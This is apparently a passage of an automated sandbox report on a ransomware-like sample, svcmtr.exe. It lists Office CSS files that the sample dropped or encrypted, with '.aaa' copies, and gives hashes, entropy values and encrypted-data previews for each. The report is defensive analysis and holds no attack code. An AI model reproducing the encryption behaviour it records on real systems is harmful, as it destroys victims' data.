                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...*..Q.J.H,....uM$....e....O..|-N..6.y.k}`.d.r..'.....X.<.=.n.eL._|..!.W........\.G.,r..H?.(...K.....$.XL5.r.\.u.."S....:..x.?RAnE.3.)H.lhH.|+...y.<...4....^....#%J...?o.W.Z.._.T.c.3..H..d...j.....~....u.]).uG~..u...f.h.0.s....9.4...r...p.2u..x~w.zk>l...._2..A2.^U....r....m.....c.:vf]Z...).G...t..X....y.....5.\J..sXk7.......z=|.+,..PG.=6.^........*..a3..W..O..V~2..Ol..X..H:u.......2u.r9.Z..>.}.[..r...&..._.X..*_..BfW..[..a./.e8...a<.....P.qAI..iSTb-..G.~.....aa/..#._.8.{...%.V5!4J2v..Yr.ak...S......w.0n.X@z..f.Vxo..d.2.=........n1.bWp<.`-.M..A.5-..d.....{....0...Z.o%..T

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME34.CSS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):119502
                                                                                                                          Entropy (8bit):7.998307854610144
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:EiMIe7sMOE6cS8jRv1pezpSxp0iJjijuv3Kbeywb1Gg1XAY:EiRewtAS8jRvLfwi3fOeLhlXF
                                                                                                                          MD5:FBA4CEFE39966FB56E22806D8B99D7D1
                                                                                                                          SHA1:BD4090DEBCB47A3FDEFC24D36D7E8864536378B2
                                                                                                                          SHA-256:5D9A85CA3E3ACAF513D2FB2CB7E89F03A5FC09DF7EBE19875EA8F02CE574C694
                                                                                                                          SHA-512:E5D6FFE7C65C9106A45E049210B62A44D9A674CD0FD1713E3C2002798E900F6A8AECFCB4BB5FA185819566ADB2C4790DCF0435ECA6BDDDBE979940B420841418
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...*..Q.J.H,....uM$....e....O..|-N..6.y.k}`.d.r..'.....X.<.=.n.eL._|..!.W........\.G.,r..H?.(...K.....$.XL5.r.\.u.."S....:..x.?RAnE.3.)H.lhH.|+...y.<...4....^....#%J...?o.W.Z.._.T.c.3..H..d...j.....~....u.]).uG~..u...f.h.0.s....9.4...r...p.2u..x~w.zk>l...._2..A2.^U....r....m.....c.:vf]Z...).G...t..X....y.....5.\J..sXk7.......z=|.+,..PG.=6.^........*..a3..W..O..V~2..Ol..X..H:u.......2u.r9.Z..>.}.[..r...&..._.X..*_..BfW..[..a./.e8...a<.....P.qAI..iSTb-..G.~.....aa/..#._.8.{...%.V5!4J2v..Yr.ak...S......w.0n.X@z..f.Vxo..d.2.=........n1.bWp<.`-.M..A.5-..d.....{....0...Z.o%..T

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME35.CSS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):132254
                                                                                                                          Entropy (8bit):7.998716550609643
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:K8hHe2PaEQeQck/LRmpxEQP/NDQ4JtBbJakO7ChrN2:PZqenCIxEQP/NR5Ml7
                                                                                                                          MD5:5081AD953E160377885B51CCE3E6DE3B
                                                                                                                          SHA1:89251D52CDFF2C90680F557C2F21AE3E71750F2C
                                                                                                                          SHA-256:5564B7340291E63E9E22241EBCDD9B57F4EC979112714706D1B7A7478A0A39BE
                                                                                                                          SHA-512:F573328789F8F8E736071A22D1A8CCC75A98BF2C979EE6D392BC2D6B9C7CB9B5B60A92C708428A4828C76E126C18BA085EE1FEEB567BCE315BB880DD0DEA4753
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264....$..mY|.............../G..=-?.M.l.&.qd.#D..g.{@..k..dvU..Q..:4e.==%.H.d.......;.u.8q.F ....2T.....v:{:....QY..Ob.e..(..F..K.l.....P....tc.[K ..cL...\.y%..wM..k..."7...p...07G..X.J&v.q|gs.......7.[X|.@...e.N.b.v..;..L..CY.gF.+N....Z.;...j...6.kc<E..=F.G...H....e...5.SxEs.KU.y.W...~...(E.w.'.q..[....,...Z.....".....l+u`3.r. {Y....G>....FKMqw$|.zFs.z..XYj..]._...*+.]/_U.D.ON..~...'W!..a2..A.&$>.f.@...ytt{...Te&..CZ....M.Q.D...-...8.....Nj7#5.}O..!.',vPn..q.*......U.]%...<.{._..2_..)7hR/.G..p.So..Lk.v../|}...H..b...5.*9.8U1&...iy#~7..S..d%_.1>&...b...IS....3...V.z...T...S.i6....

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME35.CSS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):132254
                                                                                                                          Entropy (8bit):7.998716550609643
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:K8hHe2PaEQeQck/LRmpxEQP/NDQ4JtBbJakO7ChrN2:PZqenCIxEQP/NR5Ml7
                                                                                                                          MD5:5081AD953E160377885B51CCE3E6DE3B
                                                                                                                          SHA1:89251D52CDFF2C90680F557C2F21AE3E71750F2C
                                                                                                                          SHA-256:5564B7340291E63E9E22241EBCDD9B57F4EC979112714706D1B7A7478A0A39BE
                                                                                                                          SHA-512:F573328789F8F8E736071A22D1A8CCC75A98BF2C979EE6D392BC2D6B9C7CB9B5B60A92C708428A4828C76E126C18BA085EE1FEEB567BCE315BB880DD0DEA4753
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264....$..mY|.............../G..=-?.M.l.&.qd.#D..g.{@..k..dvU..Q..:4e.==%.H.d.......;.u.8q.F ....2T.....v:{:....QY..Ob.e..(..F..K.l.....P....tc.[K ..cL...\.y%..wM..k..."7...p...07G..X.J&v.q|gs.......7.[X|.@...e.N.b.v..;..L..CY.gF.+N....Z.;...j...6.kc<E..=F.G...H....e...5.SxEs.KU.y.W...~...(E.w.'.q..[....,...Z.....".....l+u`3.r. {Y....G>....FKMqw$|.zFs.z..XYj..]._...*+.]/_U.D.ON..~...'W!..a2..A.&$>.f.@...ytt{...Te&..CZ....M.Q.D...-...8.....Nj7#5.}O..!.',vPn..q.*......U.]%...<.{._..2_..)7hR/.G..p.So..Lk.v../|}...H..b...5.*9.8U1&...iy#~7..S..d%_.1>&...b...IS....3...V.z...T...S.i6....

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME36.CSS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):123598
                                                                                                                          Entropy (8bit):7.998542346546703
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:PRhslHzk5zeZ85mhpf9lCwW1BSorVUn0/a/2lnrTLML+hz:x8hpTC1SoQben0+hz
                                                                                                                          MD5:9720CBA8F3A21A87989253B67FB9B97A
                                                                                                                          SHA1:C7A43F337568E563729045C31C56C129A734FFB3
                                                                                                                          SHA-256:E6E5776C46CAEDD0B62965E315875C93ABB9E8784B585790E15E86495055428C
                                                                                                                          SHA-512:A9D15DC12D172DB1A3502E9DE910CAB8D5B778BB140CC1BE91DB9FE7ED1BC9471DE22EADB7E439386CDFCEE534F37F32CB80F6E9BB4623A915861715FC17724B
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...M...7...3IL.,.......H.wf..E.41...xH.z..~...7.|...J.Z....0......na..Z...-.Ao.N.q.i.......w.......T.T...............m.R.@X..5..4.}..X].+...z8Q.W..b@.....>7m{..+..$)._.x.......V.2?s......X..].d.....j.>RZ.."..U}....8RL.F.....C.A....g..P...px..!}^#....)3..........q.&..."....yv...n......e.k......l...B].E.>]\.).t..Z.hq....G..T.e..4{.....H.=...G..{U{.'{+K&.5...O.Ae.......8..e...z........mJ....3...|..r9.T9.s.'....Dx......[...b..R..U?d..9<.....G....@mj5..j.....\.....[....X....5j..\..#...[h.s...f.X.pXD....E...[.....tp..Z...d..L......j/.rS(X.%./(R/.X.3.kHs..}....qZ........I.

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME36.CSS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):123598
                                                                                                                          Entropy (8bit):7.998542346546703
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:PRhslHzk5zeZ85mhpf9lCwW1BSorVUn0/a/2lnrTLML+hz:x8hpTC1SoQben0+hz
                                                                                                                          MD5:9720CBA8F3A21A87989253B67FB9B97A
                                                                                                                          SHA1:C7A43F337568E563729045C31C56C129A734FFB3
                                                                                                                          SHA-256:E6E5776C46CAEDD0B62965E315875C93ABB9E8784B585790E15E86495055428C
                                                                                                                          SHA-512:A9D15DC12D172DB1A3502E9DE910CAB8D5B778BB140CC1BE91DB9FE7ED1BC9471DE22EADB7E439386CDFCEE534F37F32CB80F6E9BB4623A915861715FC17724B
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...M...7...3IL.,.......H.wf..E.41...xH.z..~...7.|...J.Z....0......na..Z...-.Ao.N.q.i.......w.......T.T...............m.R.@X..5..4.}..X].+...z8Q.W..b@.....>7m{..+..$)._.x.......V.2?s......X..].d.....j.>RZ.."..U}....8RL.F.....C.A....g..P...px..!}^#....)3..........q.&..."....yv...n......e.k......l...B].E.>]\.).t..Z.hq....G..T.e..4{.....H.=...G..{U{.'{+K&.5...O.Ae.......8..e...z........mJ....3...|..r9.T9.s.'....Dx......[...b..R..U?d..9<.....G....@mj5..j.....\.....[....X....5j..\..#...[h.s...f.X.pXD....E...[.....tp..Z...d..L......j/.rS(X.%./(R/.X.3.kHs..}....qZ........I.

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME37.CSS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):132958
                                                                                                                          Entropy (8bit):7.998645814953201
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:QW/VnbclVc8sEHT+d0kCUBr8gXGwLBVqdo873UKeoriOFyKCUAMTwxK:QW/1YltsEHKYaAgXGwdUC87LeorZoZUL
                                                                                                                          MD5:F6475D4E7B53FBCB891CDFADCAAEA394
                                                                                                                          SHA1:DD046FB799531B986420CABB976F8F708138A390
                                                                                                                          SHA-256:72A52B9E864CA2BA3E403EAE1098914FFDCCF74FFE52424CC9A5D3AF659F5A73
                                                                                                                          SHA-512:564EFA22F2911A8DC8D23C8C9601207AAC7889E775B90C31D81F66A06A158D48B574F75FABF9D379B733B606494D5CEBBD015BD6B07A8388AC6B69FFAD49A143
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..%.....O....n.3(....:.T... ..0<(K.h>t..vN{..1.4nu...r.L......(...w.".....H...Q........%[).....R......-{.. ..F....P...9Mf......(.,..m72..O=R......qf.!J...(.%.{.....K).}.^/..n.-......\...").....BG*.:.O.E.H.?aG...Y....*g...6^....[..J...x......S..0....)3...eIe..MA..:..k..(.L'.+.C#.f....xD.c].y<(.(...D...%.$G'..S'F.7...WbON.G.-&&...:.w.7.L....Ir......?.......^.m.s...]V4.c. ..o..CS}..)rQ.4.L.?.lsgPK..^...d....t......v..+..+<u.T....O..v:N.J..;.a.[..>..}s....W..:1c..k.|..R4.....~:.l..F..yeq......5.`]M.x...k.B]2.jJU\h..4...R.;.....f,%^)+.8.J.u.O.."..)..NO".[z".^..M.-..\.z.n.e.T.....

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME37.CSS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):132958
                                                                                                                          Entropy (8bit):7.998645814953201
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:QW/VnbclVc8sEHT+d0kCUBr8gXGwLBVqdo873UKeoriOFyKCUAMTwxK:QW/1YltsEHKYaAgXGwdUC87LeorZoZUL
                                                                                                                          MD5:F6475D4E7B53FBCB891CDFADCAAEA394
                                                                                                                          SHA1:DD046FB799531B986420CABB976F8F708138A390
                                                                                                                          SHA-256:72A52B9E864CA2BA3E403EAE1098914FFDCCF74FFE52424CC9A5D3AF659F5A73
                                                                                                                          SHA-512:564EFA22F2911A8DC8D23C8C9601207AAC7889E775B90C31D81F66A06A158D48B574F75FABF9D379B733B606494D5CEBBD015BD6B07A8388AC6B69FFAD49A143
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..%.....O....n.3(....:.T... ..0<(K.h>t..vN{..1.4nu...r.L......(...w.".....H...Q........%[).....R......-{.. ..F....P...9Mf......(.,..m72..O=R......qf.!J...(.%.{.....K).}.^/..n.-......\...").....BG*.:.O.E.H.?aG...Y....*g...6^....[..J...x......S..0....)3...eIe..MA..:..k..(.L'.+.C#.f....xD.c].y<(.(...D...%.$G'..S'F.7...WbON.G.-&&...:.w.7.L....Ir......?.......^.m.s...]V4.c. ..o..CS}..)rQ.4.L.?.lsgPK..^...d....t......v..+..+<u.T....O..v:N.J..;.a.[..>..}s....W..:1c..k.|..R4.....~:.l..F..yeq......5.`]M.x...k.B]2.jJU\h..4...R.;.....f,%^)+.8.J.u.O.."..)..NO".[z".^..M.-..\.z.n.e.T.....

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME38.CSS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):127518
                                                                                                                          Entropy (8bit):7.998694331034947
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:Zl1YFE1A5Rzk4HzFQ2XpMiU5iRvpw7T7C9B5nJyxL6os:ZlCWm3BpscvpcT7C9B5nQxud
                                                                                                                          MD5:DD5219F5C6AF2EAD8A14E421860D6038
                                                                                                                          SHA1:BBD8636DBDE7B83140C4169851484F5BC35E1AE5
                                                                                                                          SHA-256:D9DFC782C726F8B25EF7801CDC4608A492F617561AD83133E56CD51C6BE74F3D
                                                                                                                          SHA-512:5F76FCBCD3E1497111CCF67CEEE7946BF6DC8594CD237DE2E511454E1D9D6AEE266BC3E4958D23D38EC719BADD8EDCA5D9C0339A999770C73D91E3EE8CE787BE
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264....>.t0..4..K...|.....$.?{."..(...5*..w..5.!..5J.....U..D.....^.&#.Z..R.,F}z[.R..|.4.4.{BO.U..3..9..>...7Hc#.2>...i..[....y....j.WZ.c....d.0+).;>....%bc`.@.*.h.#..k}7j......Gy.........OX...O...t.J.....0.\..$h}...*8n...GT...P.l@.n.G..K.............&.[..F<..K......dk.~...?Z.$.%7.+...:. .Q..?.q.F2.c.-_a}^u.Vs.!.h....<h.}.8.Zf..P.gOz..I...g.P...^..-2..h..o.....4B........N..6:^s..[c..G........ G.._p.P..~9Z.O)Qr...`.9.7FD.4...'.^..B.@[......t...Zr.F.L..7A-$.P.[..m..{.OW.wp.\.`.Q..Z..WL..)..g..&....~Uv......kUg.....,..|.X.....n.../.9.{.......gv.VO<!7a...c.v..*<.S..6i..]..l..

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME38.CSS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):127518
                                                                                                                          Entropy (8bit):7.998694331034947
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:Zl1YFE1A5Rzk4HzFQ2XpMiU5iRvpw7T7C9B5nJyxL6os:ZlCWm3BpscvpcT7C9B5nQxud
                                                                                                                          MD5:DD5219F5C6AF2EAD8A14E421860D6038
                                                                                                                          SHA1:BBD8636DBDE7B83140C4169851484F5BC35E1AE5
                                                                                                                          SHA-256:D9DFC782C726F8B25EF7801CDC4608A492F617561AD83133E56CD51C6BE74F3D
                                                                                                                          SHA-512:5F76FCBCD3E1497111CCF67CEEE7946BF6DC8594CD237DE2E511454E1D9D6AEE266BC3E4958D23D38EC719BADD8EDCA5D9C0339A999770C73D91E3EE8CE787BE
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264....>.t0..4..K...|.....$.?{."..(...5*..w..5.!..5J.....U..D.....^.&#.Z..R.,F}z[.R..|.4.4.{BO.U..3..9..>...7Hc#.2>...i..[....y....j.WZ.c....d.0+).;>....%bc`.@.*.h.#..k}7j......Gy.........OX...O...t.J.....0.\..$h}...*8n...GT...P.l@.n.G..K.............&.[..F<..K......dk.~...?Z.$.%7.+...:. .Q..?.q.F2.c.-_a}^u.Vs.!.h....<h.}.8.Zf..P.gOz..I...g.P...^..-2..h..o.....4B........N..6:^s..[c..G........ G.._p.P..~9Z.O)Qr...`.9.7FD.4...'.^..B.@[......t...Zr.F.L..7A-$.P.[..m..{.OW.wp.\.`.Q..Z..WL..)..g..&....~Uv......kUg.....,..|.X.....n.../.9.{.......gv.VO<!7a...c.v..*<.S..6i..]..l..

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME39.CSS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):124398
                                                                                                                          Entropy (8bit):7.998364155063368
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:Kh9PeAJGfXwCNCpAyk69gOwK/Vo7URaq6cPrx:K6xwCNc9F/oq6gx
                                                                                                                          MD5:F22659361F38274FAB63A9F53D8FD9E2
                                                                                                                          SHA1:9212B7AF5B46B6CFDC65BB5ADD0DF47A4A2F4BEA
                                                                                                                          SHA-256:033FA950B6BD4711DF9CFC3A51529B8041E919BC3BE460AD85B96DE7F22496FF
                                                                                                                          SHA-512:63FD7AE2B80952CCED1564A4D600136F4A6A8ACB5615AE87591FBC47EA520BF597B97365A9ECCE17C01EE9D762ADA709287E0C7BEF5721ECE256DDEA98D62002
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...r..q.F..\.H...L......}.o.._....Q...KF.....rj..].J...F./..K.(-.6..BS)........zC.l1.r.>t....{.]'4C^..........K.q.....w.z.@...=2...B.Q..j~j'..]..E:....}..f9.D...q.C.3....../=..d].H....6..5.g.C..)N##...B....>.Cl.z:...VJ...n....@....q..c..2....:..Q..L......J.P..H.n..4..w5.Ao.....c...b..N.({|...e........5.*....t9...L..9w.....(...et..x...!..3q.o.).}.gT..n.J..o.:....h.]4.....L...4.KE...9.....T..EX....P.....08?.i...[v@.......]1S..)N&...1.L...]R5\...J#v...Q..*.?.A.1.+%.q.?i.Yu.W....l}bE...d..5........?.A.]..t..:..W....V...8...../..(.ode\...b...a.....d4.D.u..A,..v'..'...'.

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME39.CSS.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):124398
                                                                                                                          Entropy (8bit):7.998364155063368
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:Kh9PeAJGfXwCNCpAyk69gOwK/Vo7URaq6cPrx:K6xwCNc9F/oq6gx
                                                                                                                          MD5:F22659361F38274FAB63A9F53D8FD9E2
                                                                                                                          SHA1:9212B7AF5B46B6CFDC65BB5ADD0DF47A4A2F4BEA
                                                                                                                          SHA-256:033FA950B6BD4711DF9CFC3A51529B8041E919BC3BE460AD85B96DE7F22496FF
                                                                                                                          SHA-512:63FD7AE2B80952CCED1564A4D600136F4A6A8ACB5615AE87591FBC47EA520BF597B97365A9ECCE17C01EE9D762ADA709287E0C7BEF5721ECE256DDEA98D62002
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...r..q.F..\.H...L......}.o.._....Q...KF.....rj..].J...F./..K.(-.6..BS)........zC.l1.r.>t....{.]'4C^..........K.q.....w.z.@...=2...B.Q..j~j'..]..E:....}..f9.D...q.C.3....../=..d].H....6..5.g.C..)N##...B....>.Cl.z:...VJ...n....@....q..c..2....:..Q..L......J.P..H.n..4..w5.Ao.....c...b..N.({|...e........5.*....t9...L..9w.....(...et..x...!..3q.o.).}.gT..n.J..o.:....h.]4.....L...4.KE...9.....T..EX....P.....08?.i...[v@.......]1S..)N&...1.L...]R5\...J#v...Q..*.?.A.1.+%.q.?i.Yu.W....l}bE...d..5........?.A.]..t..:..W....V...8...../..(.ode\...b...a.....d4.D.u..A,..v'..'...'.

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME40.CSS

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):126190
                                                                                                                          Entropy (8bit):7.9982591023833
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:bl5T8nBafSlTNwFvzC9LMEVtLmp3PxaO1M4:5h8nkfSlTOBzooEqp3D1F
                                                                                                                          MD5:2A1E5078C3DDEAA72A69877E2B504E3A
                                                                                                                          SHA1:1B37D57B20F1A6453F8075D82DCCACAF3743941B
                                                                                                                          SHA-256:34489B4FEEB81836849604D1852378AB69CE4395EABAD3D03EBAE151A7C0540C
                                                                                                                          SHA-512:0B2C496F14A09D1DA3E9EDC947602A44C781D3BD66CF4741707E7AC5F43F073860215CFCE6EE0C34E3DDBA8AE2EFBA21F76660345C4E34BADFB96882E80E2D2A
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264.. .&....S0.g/....J...8..hSk.Vb.....|.z.!..=a'B.....o..o..@.@..h..|Q.3.q....y.E.O.vT..dw..e...r-6..^^...PZ...F.\&....R.Y.U.............6..ZeB}3...F&..@.. ..8b...^#ni.$..<|Jn......P.G.m..9.s.ad.e.G.w..F0`....n1..nt.;..9..T..ZY.v;{...U...MNUN9=.V)......+....^..I}|..DQ..\.*..7DN....}..L..&...4..p.Bq.13.................+I..@..[ .m5..v....k.!....X.-?..BJ....T..s.X....,.........=.ow9[y.X...(........w..O..E{...Q....A..N.,..n.T..KP.B.=.=P..*Y......N..s.w...>..X..1:......<....`).k.UN....i.mb...M..9.............I....X....y.r..va[...8.........7.X,.Ae....W\..@.L........(;..W.

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME40.CSS.aaa (copy)

                                                                                                                          Download File
